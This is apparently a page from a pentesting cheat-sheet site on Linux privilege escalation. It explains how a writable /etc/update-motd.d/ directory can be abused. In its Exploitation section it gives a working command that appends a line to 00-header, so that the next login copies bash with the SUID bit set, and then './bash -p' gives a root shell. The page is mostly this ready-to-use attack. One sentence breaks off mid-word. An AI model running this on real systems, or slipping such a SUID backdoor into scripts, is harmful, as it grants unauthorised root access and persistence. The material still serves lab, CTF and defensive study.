Update-Motd Privilege Escalation

/etc/update-motd.d/ is used to generate the dynamic message of the day (MOTD) that is displayed to users when they log in to the system. If we can modify files listed in the directory, we can inject m

Investigation

ls -al /etc/update-motd.d/
Copied!

If we have permission to modify files in this directory, we can inject arbitrary code and execute when logging in.

Exploitation

Run the following code to copy bash binary and give suid to this file. Replace <username> with your current user name.

echo "cp /bin/bash /home/<username>/bash && chmod u+s /home/<username>/bash" >> /etc/update-motd.d/00-header
Copied!

After that, log out and log in again with SSH. The above script should be executed. Now execute the following command under /home/<username>.

./bash -p

PreviousTar Wildcard Injection PrivEsc Nextirb (Interactive Ruby Shell) Privilege Escalation

Last updated 2 years ago

hashtagInvestigationarrow-up-right

hashtagExploitationarrow-up-right

Investigation

Exploitation